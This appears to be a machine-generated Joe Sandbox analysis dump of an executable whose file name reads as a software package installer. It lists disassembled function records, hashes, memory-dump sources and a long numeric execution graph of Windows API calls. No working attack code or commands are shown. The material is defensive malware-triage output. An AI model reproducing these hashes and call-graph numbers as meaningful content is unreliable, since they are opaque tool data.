                          • API String ID: 1659562826-4022487301
                          • Opcode ID: 7481122d5b97c2d88c264217630fae5cfc4ffc6a23011c1391bf90b2a1b3979d
                          • Instruction ID: d2b7d8fa3f31708c379db71aa0b38a05ad808fb37dcc581fc23dc891ece93643
                          • Opcode Fuzzy Hash: 7481122d5b97c2d88c264217630fae5cfc4ffc6a23011c1391bf90b2a1b3979d
                          • Instruction Fuzzy Hash: 4E41BB716141B4AFDB118F28E880BE97FF5EF46348F1C4398E9828BA41E3399D95C790
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA46000, based on PE: true
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: __aulldiv
                          • String ID: 3333
                          • API String ID: 3732870572-2924271548
                          • Opcode ID: 0d34d547a1763b1f6cbcb81569cbe66ca114cba913daa42be50c89cb46dd64ee
                          • Instruction ID: f1bf1f4671faf801f70e648b471680c19a2e306a8d248195b05ef76bea2ae78f
                          • Opcode Fuzzy Hash: 0d34d547a1763b1f6cbcb81569cbe66ca114cba913daa42be50c89cb46dd64ee
                          • Instruction Fuzzy Hash: 5521BAB09017046FE720CFB98984B5BF6FCEB88714F50891EA586D7B40D77099888765
                          APIs
                          • _free.LIBCMT ref: 6CA2CB69
                          • HeapReAlloc.KERNEL32(00000000,?,?,00000004,00000000,?,6CA2945A,?,00000004,?,4B42FCB6,?,?,6CA1E5AC,4B42FCB6,?), ref: 6CA2CBA5
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                          • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: AllocHeap_free
                          • String ID: 8Q
                          • API String ID: 1080816511-4022487301
                          • Opcode ID: 1a1f30844c3e6fdd0eb3edd7d8ec5a648657cf9cad1514574fae8d6ea9314204
                          • Instruction ID: 84a14a7487c054fc662ddaeb302cbe4bbbe89295e5fbe7ba45338cca57b7e662
                          • Opcode Fuzzy Hash: 1a1f30844c3e6fdd0eb3edd7d8ec5a648657cf9cad1514574fae8d6ea9314204
                          • Instruction Fuzzy Hash: 91F0963674613566FB113A36AC04F9B376C9F83A7CB2D4215F81497E80DF2CD5C985A4
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA46000, based on PE: true
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID:
                          • String ID: @ K$DJ$T)K$X/K
                          • API String ID: 0-3815299647
                          • Opcode ID: c2360a40d33ebeca7632374cab2a44736fbf981b028df34ec032509b6de52aa1
                          • Instruction ID: 9ce651834a1ec1d6408a9ff73db8cc48fa50d96c10289a3065cd5c2934d12dcd
                          • Opcode Fuzzy Hash: c2360a40d33ebeca7632374cab2a44736fbf981b028df34ec032509b6de52aa1
                          • Instruction Fuzzy Hash: 0F91E430A053459BDB08DFA4C5507EE77A2AF4130CF148819CCE69BB85DB75A9CECB51
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA46000, based on PE: true
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID:
                          • String ID: D)K$H)K$P)K$T)K
                          • API String ID: 0-2262112463
                          • Opcode ID: 9be5c025380eda7c216aac381ad020450c93343e5c05b53f9846b5bc651498f8
                          • Instruction ID: 1c9bdd99dbb50333d2626a25340791c9349387b977c8d28bbc252f7ae5119b17
                          • Opcode Fuzzy Hash: 9be5c025380eda7c216aac381ad020450c93343e5c05b53f9846b5bc651498f8
                          • Instruction Fuzzy Hash: D451E4309042499FCF10CFD5D944AEEB771AF1931CF24851AE815A7A81DB7199EEC750
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA46000, based on PE: true
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID:
                          • String ID: &qB$0aJ$A0$XqB
                          • API String ID: 0-1326096578
                          • Opcode ID: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                          • Instruction ID: 90b8915cf1d6a333a422e74401d6658e0af07c8cb4276cde329834b654d90004
                          • Opcode Fuzzy Hash: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                          • Instruction Fuzzy Hash: 47218E71D01258EECF05DBE5DA849EDBBB4AF25308F20806AD41667B81DB780E8CCB51
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA46000, based on PE: true
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID:
                          • String ID: J$0J$DJ$`J
                          • API String ID: 0-2453737217
                          • Opcode ID: 94eb96797db7bdd6310de836df89d4e5c2fb6b25f25e237953e0bbd1ee8067ab
                          • Instruction ID: 2484baddb9f2c9242b115bd01482e6932cf53eadf63c4a45d7a12f07639f01f2
                          • Opcode Fuzzy Hash: 94eb96797db7bdd6310de836df89d4e5c2fb6b25f25e237953e0bbd1ee8067ab
                          • Instruction Fuzzy Hash: 7311C2B0900B64CEC720DF5AC55419AFBE4BFA5708B10C91FC4A787B50D7F8A548CB99

                          Execution Graph

                          Execution Coverage: 4%
                          Dynamic/Decrypted Code Coverage: 0%
                          Signature Coverage: 0.4%
                          Total number of Nodes: 2000
                          Total number of Limit Nodes: 62
74336->74327 74480 194cac VariantClear __EH_prolog 74336->74480 74339 19563a __EH_prolog 74338->74339 74341 195679 74339->74341 74481 1a3558 10 API calls 2 library calls 74339->74481 74342 182f1c 2 API calls 74341->74342 74358 19571a 74341->74358 74343 195696 74342->74343 74482 1a3333 malloc _CxxThrowException free 74343->74482 74345 1956a2 74346 1956ad 74345->74346 74347 1956c5 74345->74347 74483 197853 5 API calls 2 library calls 74346->74483 74350 1956b4 74347->74350 74484 184adf wcscmp 74347->74484 74351 195707 74350->74351 74486 181089 malloc _CxxThrowException free _CxxThrowException 74350->74486 74487 1831e5 malloc _CxxThrowException free _CxxThrowException 74351->74487 74352 1956d2 74352->74350 74485 197853 5 API calls 2 library calls 74352->74485 74355 195712 74488 181e40 free 74355->74488 74358->74141 74360 1958c8 __EH_prolog 74359->74360 74361 182e04 2 API calls 74360->74361 74443->74143 74444->74148 74445->74150 74446->74171 74451->74163 74478->74334 74479->74336 74480->74327 74481->74341 74482->74345 74483->74350 74484->74352 74485->74350 74486->74351 74487->74355 74488->74358 74559->74255 74560->74248 74561->74248 74563 19719a __EH_prolog 74562->74563 74564 1971b0 74563->74564 74568 1971dd 74563->74568 74565 194d78 VariantClear 74564->74565 74572 1971b7 74565->74572 74567 197236 74569 1972b4 74567->74569 74567->74572 74574 1972a3 SetFileSecurityW 74567->74574 74575 196fc5 74568->74575 74570 194d78 VariantClear 74569->74570 74571 1972c0 74569->74571 74570->74571 74571->74572 74573 197140 7 API calls 74571->74573 74572->74025 74573->74572 74574->74569 74576 196fcf __EH_prolog 74575->74576 74601 1944a6 74576->74601 74578 197029 74586 19706a 74578->74586 74623 194dff 7 API calls 2 library calls 74578->74623 74584 19709e 74628 181e40 free 74584->74628 74585 197051 74585->74586 74589 1911b4 107 API calls 74585->74589 74604 1968ac 74586->74604 74588 1970c0 74624 186096 15 API calls 2 library calls 74588->74624 74589->74586 74590 19712e 74590->74567 74592 
1970d1 74593 1970e2 74592->74593 74625 194dff 7 API calls 2 library calls 74592->74625 74597 1970e6 74593->74597 74626 196b5e 69 API calls 2 library calls 74593->74626 74596 1970fd 74596->74597 74598 197103 74596->74598 74597->74584 74627 181e40 free 74598->74627 74600 19710b 74600->74590 74602 182e04 2 API calls 74601->74602 74603 1944be 74602->74603 74603->74578 74603->74586 74622 196e71 12 API calls 2 library calls 74603->74622 74605 1968b6 __EH_prolog 74604->74605 74606 196921 74605->74606 74607 187d4b 6 API calls 74605->74607 74621 1968c5 74605->74621 74608 196998 74606->74608 74609 196962 74606->74609 74631 196a17 6 API calls 2 library calls 74606->74631 74610 196906 74607->74610 74611 1969e1 74608->74611 74629 187c3b SetFileTime 74608->74629 74609->74608 74632 182dcd malloc _CxxThrowException 74609->74632 74610->74606 74630 194dff 7 API calls 2 library calls 74610->74630 74635 18bcf8 CloseHandle 74611->74635 74614 19697a 74633 196b09 13 API calls __EH_prolog 74614->74633 74619 19698c 74634 181e40 free 74619->74634 74621->74584 74621->74588 74622->74578 74623->74585 74624->74592 74625->74593 74626->74596 74627->74600 74628->74590 74629->74611 74630->74606 74631->74609 74632->74614 74633->74619 74634->74608 74635->74621 74636 1c0343 74641 1c035f 74636->74641 74640 1c0358 74642 1c0369 __EH_prolog 74641->74642 74658 19139e 74642->74658 74650 1c03a2 74675 181e40 free 74650->74675 74652 1c03aa 74676 1c03d8 74652->74676 74657 181e40 free 74657->74640 74659 1913ae 74658->74659 74661 1913b3 74658->74661 74692 217ea0 SetEvent GetLastError 74659->74692 74662 1c01c4 74661->74662 74664 1c01ce __EH_prolog 74662->74664 74666 1c0203 74664->74666 74694 181e40 free 74664->74694 74665 1c020b 74668 1c0143 74665->74668 74693 181e40 free 74666->74693 74669 1c014d __EH_prolog 74668->74669 74672 1c0182 74669->74672 74696 181e40 free 74669->74696 74671 1c018a 74674 181e40 free 74671->74674 74695 181e40 free 74672->74695 74674->74650 74675->74652 74677 1c03e2 __EH_prolog 74676->74677 
74678 19139e ctype 2 API calls 74677->74678 74679 1c03fb 74678->74679 74697 217d50 74679->74697 74681 1c0403 74682 217d50 ctype 2 API calls 74681->74682 74683 1c040b 74682->74683 74684 217d50 ctype 2 API calls 74683->74684 74685 1c03b7 74684->74685 74686 1c004a 74685->74686 74687 1c0054 __EH_prolog 74686->74687 74703 181e40 free 74687->74703 74689 1c0067 74704 181e40 free 74689->74704 74691 1c006f 74691->74640 74691->74657 74692->74661 74693->74665 74694->74664 74695->74671 74696->74669 74698 217d59 CloseHandle 74697->74698 74699 217d7b 74697->74699 74700 217d75 74698->74700 74701 217d64 GetLastError 74698->74701 74699->74681 74700->74699 74701->74699 74702 217d6e 74701->74702 74702->74681 74703->74689 74704->74691 74705 1aa7c5 74722 1aa7e9 74705->74722 74756 1aa96b 74705->74756 74706 1aade3 74810 181e40 free 74706->74810 74707 1aa952 74707->74756 74791 1ae0b0 6 API calls 74707->74791 74709 1aadeb 74811 181e40 free 74709->74811 74713 1aae99 74715 181e0c ctype 2 API calls 74713->74715 74714 1aac1e 74797 181e40 free 74714->74797 74719 1aaea9 memset memset 74715->74719 74718 1aadf3 74718->74713 74724 1c04d2 malloc _CxxThrowException free _CxxThrowException memcpy 74718->74724 74723 1aaedd 74719->74723 74720 1aac26 74798 181e40 free 74720->74798 74722->74707 74731 1c04d2 5 API calls 74722->74731 74790 1ae0b0 6 API calls 74722->74790 74812 181e40 free 74723->74812 74724->74718 74728 1aaee5 74813 181e40 free 74728->74813 74730 1aaef0 74814 181e40 free 74730->74814 74731->74722 74735 1ac430 74816 181e40 free 74735->74816 74737 1aac6c 74799 181e40 free 74737->74799 74738 1ac438 74817 181e40 free 74738->74817 74741 1ac443 74818 181e40 free 74741->74818 74743 1aac85 74800 181e40 free 74743->74800 74745 1ac44e 74819 181e40 free 74745->74819 74748 1aac2e 74815 181e40 free 74748->74815 74749 1ac459 74751 1aad88 74807 1a8125 free ctype 74751->74807 74755 1aad93 74808 181e40 free 74755->74808 74756->74706 74756->74714 74756->74737 74756->74751 74757 1aad17 74756->74757 74758 
1aacbc 74756->74758 74772 19101c 74756->74772 74775 1a98f2 74756->74775 74781 1acc6f 74756->74781 74792 1a9531 5 API calls __EH_prolog 74756->74792 74793 1a80c1 malloc _CxxThrowException __EH_prolog 74756->74793 74794 1ac820 5 API calls 2 library calls 74756->74794 74795 1a814d 6 API calls 74756->74795 74796 1a8125 free ctype 74756->74796 74804 1a8125 free ctype 74757->74804 74801 1a8125 free ctype 74758->74801 74762 1aad3c 74805 181e40 free 74762->74805 74763 1aadac 74809 181e40 free 74763->74809 74764 1aacc7 74802 181e40 free 74764->74802 74768 1aace0 74803 181e40 free 74768->74803 74769 1aad55 74806 181e40 free 74769->74806 74820 18b95a 74772->74820 74776 1a98fc __EH_prolog 74775->74776 74827 1a9987 74776->74827 74778 1a9911 74779 1a9970 74778->74779 74831 1aef8d 12 API calls 2 library calls 74778->74831 74779->74756 74871 1cf445 74781->74871 74877 1c5505 74781->74877 74881 1ccf91 74781->74881 74782 1acc8b 74786 1acccb 74782->74786 74889 1a979e VariantClear __EH_prolog 74782->74889 74784 1accb1 74784->74786 74890 1acae9 VariantClear 74784->74890 74786->74756 74790->74722 74791->74756 74792->74756 74793->74756 74794->74756 74795->74756 74796->74756 74797->74720 74798->74748 74799->74743 74800->74748 74801->74764 74802->74768 74803->74748 74804->74762 74805->74769 74806->74748 74807->74755 74808->74763 74809->74748 74810->74709 74811->74718 74812->74728 74813->74730 74814->74748 74815->74735 74816->74738 74817->74741 74818->74745 74819->74749 74821 18b969 74820->74821 74822 18b97d 74820->74822 74821->74822 74823 187731 5 API calls 74821->74823 74822->74756 74824 18b9ee 74823->74824 74824->74822 74826 18b8ec GetLastError 74824->74826 74826->74822 74828 1a9991 __EH_prolog 74827->74828 74832 1d80aa 74828->74832 74829 1a99a8 74829->74778 74831->74779 74833 1d80b4 __EH_prolog 74832->74833 74834 181e0c ctype 2 API calls 74833->74834 74835 1d80bf 74834->74835 74836 1d80d3 74835->74836 74838 1cbdb5 74835->74838 74836->74829 74839 1cbdbf __EH_prolog 74838->74839 74844 
1cbe69 74839->74844 74841 1cbdef 74842 182e04 2 API calls 74841->74842 74843 1cbe16 74842->74843 74843->74836 74845 1cbe73 __EH_prolog 74844->74845 74848 1c5e2b 74845->74848 74847 1cbe7f 74847->74841 74849 1c5e35 __EH_prolog 74848->74849 74854 1c08b6 74849->74854 74851 1c5e41 74859 19dfc9 malloc _CxxThrowException __EH_prolog 74851->74859 74853 1c5e57 74853->74847 74860 189c60 74854->74860 74856 1c08c4 74865 189c8f GetModuleHandleA GetProcAddress 74856->74865 74858 1c08f3 __aulldiv 74858->74851 74859->74853 74870 189c4d GetCurrentProcess GetProcessAffinityMask 74860->74870 74862 189c6e 74863 189c80 GetSystemInfo 74862->74863 74864 189c79 74862->74864 74863->74856 74864->74856 74866 189cef GlobalMemoryStatus 74865->74866 74867 189cc4 GlobalMemoryStatusEx 74865->74867 74868 189d08 74866->74868 74867->74866 74869 189cce 74867->74869 74868->74869 74869->74858 74870->74862 74872 1cf455 74871->74872 74891 191092 74872->74891 74876 1cf478 74876->74782 74878 1c550f __EH_prolog 74877->74878 74943 1c4e8a 74878->74943 74882 1ccf9b __EH_prolog 74881->74882 74883 1cf445 14 API calls 74882->74883 74884 1cd018 74883->74884 74888 1cd01f 74884->74888 75166 1d1511 74884->75166 74886 1cd08b 74886->74888 75172 1d2c5d 11 API calls 2 library calls 74886->75172 74888->74782 74889->74784 74890->74786 74893 18b95a 6 API calls 74891->74893 74892 1910aa 74892->74876 74894 1cf1b2 74892->74894 74893->74892 74895 1cf1bc __EH_prolog 74894->74895 74904 191168 74895->74904 74897 1cf1e6 74897->74876 74898 1cf1d3 74898->74897 74899 1cf21c _CxxThrowException 74898->74899 74900 1cf231 memcpy 74898->74900 74899->74900 74902 1cf24c 74900->74902 74901 1cf2f0 memmove 74901->74902 74902->74897 74902->74901 74903 1cf31a memcpy 74902->74903 74903->74897 74907 19111c 74904->74907 74909 191130 74907->74909 74908 19115f 74908->74898 74909->74908 74912 18d331 74909->74912 74916 18b668 74909->74916 74913 18d355 74912->74913 74914 18d374 74913->74914 74915 18b668 10 API calls 74913->74915 74914->74909 74915->74914 
74919 18b675 74916->74919 74921 187731 5 API calls 74919->74921 74923 18b81b 74919->74923 74924 18b7e7 74919->74924 74925 18b811 74919->74925 74927 18b7ad 74919->74927 74928 18b6aa 74919->74928 74933 18b864 74919->74933 74940 187b4f ReadFile 74919->74940 74920 18b8aa GetLastError 74920->74928 74921->74919 74922 18b839 memcpy 74922->74928 74923->74922 74923->74928 74926 187731 5 API calls 74924->74926 74924->74933 74941 18b8ec GetLastError 74925->74941 74929 18b80d 74926->74929 74927->74919 74934 18b8c7 74927->74934 74939 206a20 VirtualAlloc 74927->74939 74928->74909 74929->74925 74929->74933 74935 187b7c 74933->74935 74934->74928 74936 187b89 74935->74936 74942 187b4f ReadFile 74936->74942 74938 187b9a 74938->74920 74938->74928 74939->74927 74940->74919 74941->74928 74942->74938 74944 1c4e94 __EH_prolog 74943->74944 74945 182e04 2 API calls 74944->74945 74961 1c4f1d 74944->74961 74946 1c4ed7 74945->74946 75075 197fc5 74946->75075 74948 1c4f0a 74952 18965d VariantClear 74948->74952 74949 1c4f37 74950 1c4f41 74949->74950 74951 1c4f63 74949->74951 74953 18965d VariantClear 74950->74953 74954 182f88 3 API calls 74951->74954 74955 1c4f15 74952->74955 74956 1c4f4c 74953->74956 74957 1c4f71 74954->74957 75096 181e40 free 74955->75096 75097 181e40 free 74956->75097 74960 18965d VariantClear 74957->74960 74962 1c4f80 74960->74962 74961->74782 75098 195bcf malloc _CxxThrowException 74962->75098 74964 1c4f9a 74965 182e47 2 API calls 74964->74965 74966 1c4fad 74965->74966 74967 182f1c 2 API calls 74966->74967 74968 1c4fbd 74967->74968 74969 182e04 2 API calls 74968->74969 74970 1c4fd1 74969->74970 74971 182e04 2 API calls 74970->74971 74980 1c4fdd 74971->74980 74972 1c5404 75143 181e40 free 74972->75143 74974 1c540c 75144 181e40 free 74974->75144 74976 1c5414 75145 181e40 free 74976->75145 74979 1c5099 74982 182da9 2 API calls 74979->74982 74980->74972 75099 195bcf malloc _CxxThrowException 74980->75099 74981 1c541c 75146 181e40 free 74981->75146 74984 1c50a9 74982->74984 
74986 182fec 3 API calls 74984->74986 74985 1c5424 75147 181e40 free 74985->75147 74988 1c50b6 74986->74988 75100 181e40 free 74988->75100 74989 1c542c 75148 181e40 free 74989->75148 74992 1c50be 75101 181e40 free 74992->75101 74994 1c50cd 74995 182f88 3 API calls 74994->74995 74996 1c50e3 74995->74996 74997 1c5100 74996->74997 74998 1c50f1 74996->74998 75108 183044 malloc _CxxThrowException free ctype 74997->75108 75102 1830ea 74998->75102 75001 1c50fe 75109 191029 6 API calls 75001->75109 75003 1c511a 75004 1c516b 75003->75004 75005 1c5120 75003->75005 75116 19089e malloc _CxxThrowException free _CxxThrowException memcpy 75004->75116 75110 181e40 free 75005->75110 75008 1c5187 75012 1c04d2 5 API calls 75008->75012 75009 1c5128 75111 181e40 free 75009->75111 75011 1c5130 75112 181e40 free 75011->75112 75014 1c51ba 75012->75014 75117 1c0516 malloc _CxxThrowException ctype 75014->75117 75015 1c5138 75113 181e40 free 75015->75113 75018 1c51c5 75022 1c522d 75018->75022 75023 1c51f5 75018->75023 75019 1c5140 75114 181e40 free 75019->75114 75021 1c5148 75115 181e40 free 75021->75115 75025 182e04 2 API calls 75022->75025 75118 181e40 free 75023->75118 75072 1c5235 75025->75072 75027 1c51fd 75119 181e40 free 75027->75119 75030 1c5205 75120 181e40 free 75030->75120 75031 1c532e 75129 181e40 free 75031->75129 75034 1c520d 75035 1c5347 75035->74972 75037 1c5358 75035->75037 75040 1c53a3 75136 181e40 free 75040->75136 75050 1c53bc 75137 181e40 free 75050->75137 75058 1c04d2 5 API calls 75058->75072 75072->75031 75072->75040 75072->75058 75073 182e04 2 API calls 75072->75073 75124 1c545c 5 API calls 2 library calls 75072->75124 75125 191029 6 API calls 75072->75125 75126 19089e malloc _CxxThrowException free _CxxThrowException memcpy 75072->75126 75127 1c0516 malloc _CxxThrowException ctype 75072->75127 75128 181e40 free 75072->75128 75073->75072 75076 197fcf __EH_prolog 75075->75076 75077 197ff4 75076->75077 75079 19805c 75076->75079 75080 198061 75076->75080 75081 198019 
75076->75081 75086 19800a 75077->75086 75149 18950d 75077->75149 75157 189630 VariantClear 75079->75157 75080->75079 75093 198025 75080->75093 75081->75077 75084 19801e 75081->75084 75083 1980b8 75085 18965d VariantClear 75083->75085 75087 198042 75084->75087 75088 198022 75084->75088 75090 1980c0 75085->75090 75158 189736 VariantClear 75086->75158 75155 189597 VariantClear 75087->75155 75091 198032 75088->75091 75088->75093 75090->74948 75090->74949 75154 189604 VariantClear 75091->75154 75093->75086 75156 1895df VariantClear 75093->75156 75096->74961 75097->74961 75098->74964 75099->74979 75100->74992 75101->74994 75103 1830fd 75102->75103 75103->75103 75104 181e0c ctype 2 API calls 75103->75104 75107 18311d 75103->75107 75105 183113 75104->75105 75165 181e40 free 75105->75165 75107->75001 75108->75001 75109->75003 75110->75009 75111->75011 75112->75015 75113->75019 75114->75021 75115->74961 75116->75008 75117->75018 75118->75027 75119->75030 75120->75034 75124->75072 75125->75072 75126->75072 75127->75072 75128->75072 75129->75035 75136->75050 75143->74974 75144->74976 75145->74981 75146->74985 75147->74989 75148->74961 75159 189767 75149->75159 75151 189518 SysAllocStringLen 75152 189539 _CxxThrowException 75151->75152 75153 18954f 75151->75153 75152->75153 75153->75086 75154->75086 75155->75086 75156->75086 75157->75086 75158->75083 75160 189779 75159->75160 75161 189770 75159->75161 75164 189686 VariantClear 75160->75164 75161->75151 75163 189780 75163->75151 75164->75163 75165->75107 75167 1d151b __EH_prolog 75166->75167 75173 1d10d3 75167->75173 75170 1d1589 75170->74886 75171 1d1552 _CxxThrowException 75171->74886 75172->74888 75174 1d10dd __EH_prolog 75173->75174 75205 1cd1b7 75174->75205 75176 1d12ef 75176->75170 75176->75171 75177 1d11f4 75177->75176 75204 18b95a 6 API calls 75177->75204 75178 1d139e 75178->75176 75180 1d13c4 75178->75180 75181 181e0c ctype 2 API calls 75178->75181 75182 191168 10 API calls 75180->75182 75181->75180 75186 1d13da 
75182->75186 75183 191168 10 API calls 75183->75177 75184 1d13de 75253 181e40 free 75184->75253 75186->75184 75188 1d13f9 75186->75188 75247 1cef67 _CxxThrowException 75186->75247 75212 1cf047 75188->75212 75191 1d14ba 75251 1d0943 50 API calls 2 library calls 75191->75251 75192 1d1450 75216 1d06ae 75192->75216 75196 1d14e7 75252 1b2db9 free ctype 75196->75252 75204->75178 75254 1cd23c 75205->75254 75207 1cd1ed 75261 181e40 free 75207->75261 75209 1cd209 75262 181e40 free 75209->75262 75211 1cd21c 75211->75176 75211->75177 75211->75183 75213 1cf063 75212->75213 75214 1cf072 75213->75214 75290 1cef67 _CxxThrowException 75213->75290 75214->75191 75214->75192 75248 1cef67 _CxxThrowException 75214->75248 75217 1d06b8 __EH_prolog 75216->75217 75291 1d03f4 75217->75291 75222 1d08e3 _CxxThrowException 75224 1d08f7 75222->75224 75229 1cb8dc ctype free 75224->75229 75227 18429a 3 API calls 75230 1d0715 75227->75230 75230->75222 75230->75224 75230->75227 75233 181e0c ctype 2 API calls 75230->75233 75245 1d0877 75230->75245 75246 1cef67 _CxxThrowException 75230->75246 75321 1912a5 75230->75321 75326 1c81ec 75230->75326 75233->75230 75412 1cb8dc 75245->75412 75246->75230 75247->75188 75248->75192 75251->75196 75252->75184 75253->75176 75263 1cd2b8 75254->75263 75257 1cd25e 75280 181e40 free 75257->75280 75260 1cd275 75260->75207 75261->75209 75262->75211 75282 181e40 free 75263->75282 75265 1cd2c8 75283 181e40 free 75265->75283 75267 1cd2dc 75284 181e40 free 75267->75284 75269 1cd2e7 75285 181e40 free 75269->75285 75271 1cd2f2 75286 181e40 free 75271->75286 75273 1cd2fd 75287 181e40 free 75273->75287 75275 1cd308 75288 181e40 free 75275->75288 75277 1cd313 75278 1cd246 75277->75278 75289 181e40 free 75277->75289 75278->75257 75281 181e40 free 75278->75281 75280->75260 75281->75257 75282->75265 75283->75267 75284->75269 75285->75271 75286->75273 75287->75275 75288->75277 75289->75278 75290->75214 75292 1cf047 _CxxThrowException 75291->75292 75293 1d0407 75292->75293 75294 
1cf047 _CxxThrowException 75293->75294 75295 1d0475 75293->75295 75297 1d0421 75294->75297 75310 1d049a 75295->75310 75429 1cfa3f 22 API calls 2 library calls 75295->75429 75296 1d04b8 75299 1d04e8 75296->75299 75300 1d04cd 75296->75300 75301 1d043e 75297->75301 75426 1cef67 _CxxThrowException 75297->75426 75432 1d7c4a malloc _CxxThrowException free ctype 75299->75432 75431 1cfff0 9 API calls 2 library calls 75300->75431 75427 1cf93c 7 API calls 2 library calls 75301->75427 75302 1d0492 75306 1cf047 _CxxThrowException 75302->75306 75306->75310 75308 1d04db 75313 1cf047 _CxxThrowException 75308->75313 75310->75296 75430 1d159a malloc _CxxThrowException free ctype 75310->75430 75311 1d04e3 75316 1d054a 75311->75316 75434 1cef67 _CxxThrowException 75311->75434 75312 1d0446 75314 1d046d 75312->75314 75428 1cef67 _CxxThrowException 75312->75428 75313->75311 75315 1cf047 _CxxThrowException 75314->75315 75315->75295 75316->75230 75317 1d04f3 75317->75311 75433 19089e malloc _CxxThrowException free _CxxThrowException memcpy 75317->75433 75322 1c04d2 5 API calls 75321->75322 75327 1c81f6 __EH_prolog 75326->75327 75426->75301 75427->75312 75428->75314 75429->75302 75430->75296 75431->75308 75432->75317 75433->75317 75434->75316 75511 1acefb 75512 1ad0cc 75511->75512 75513 1acf03 75511->75513 75513->75512 75558 1acae9 VariantClear 75513->75558 75515 1acf59 75515->75512 75559 1acae9 VariantClear 75515->75559 75517 1acf71 75517->75512 75560 1acae9 VariantClear 75517->75560 75519 1acf87 75519->75512 75561 1acae9 VariantClear 75519->75561 75521 1acf9d 75521->75512 75562 1acae9 VariantClear 75521->75562 75523 1acfb3 75523->75512 75563 1acae9 VariantClear 75523->75563 75525 1acfc9 75525->75512 75564 184504 malloc _CxxThrowException 75525->75564 75527 1acfdc 75528 182e04 2 API calls 75527->75528 75530 1acfe7 75528->75530 75529 1ad009 75532 1ad07b 75529->75532 75534 1ad080 75529->75534 75535 1ad030 75529->75535 75530->75529 75531 182f88 3 API calls 75530->75531 75531->75529 75572 
181e40 free 75532->75572 75569 1a7a0c CharUpperW 75534->75569 75538 182e04 2 API calls 75535->75538 75536 1ad0c4 75573 181e40 free 75536->75573 75541 1ad038 75538->75541 75540 1ad08b 75570 19fdbc 4 API calls 2 library calls 75540->75570 75542 182e04 2 API calls 75541->75542 75544 1ad046 75542->75544 75565 19fdbc 4 API calls 2 library calls 75544->75565 75545 1ad0a7 75547 182fec 3 API calls 75545->75547 75549 1ad0b3 75547->75549 75548 1ad057 75550 182fec 3 API calls 75548->75550 75571 181e40 free 75549->75571 75552 1ad063 75550->75552 75566 181e40 free 75552->75566 75554 1ad06b 75567 181e40 free 75554->75567 75556 1ad073 75568 181e40 free 75556->75568 75558->75515 75559->75517 75560->75519 75561->75521 75562->75523 75563->75525 75564->75527 75565->75548 75566->75554 75567->75556 75568->75532 75569->75540 75570->75545 75571->75532 75572->75536 75573->75512 75574 18c3bd 75575 18c3db 75574->75575 75576 18c3ca 75574->75576 75576->75575 75578 181e40 free 75576->75578 75578->75575 75579 1b993d 75663 1bb5b1 75579->75663 75582 1b9963 75669 191f33 75582->75669 75585 1b9975 75586 1b99b7 GetStdHandle GetConsoleScreenBufferInfo 75585->75586 75587 1b99ce 75585->75587 75586->75587 75588 181e0c ctype 2 API calls 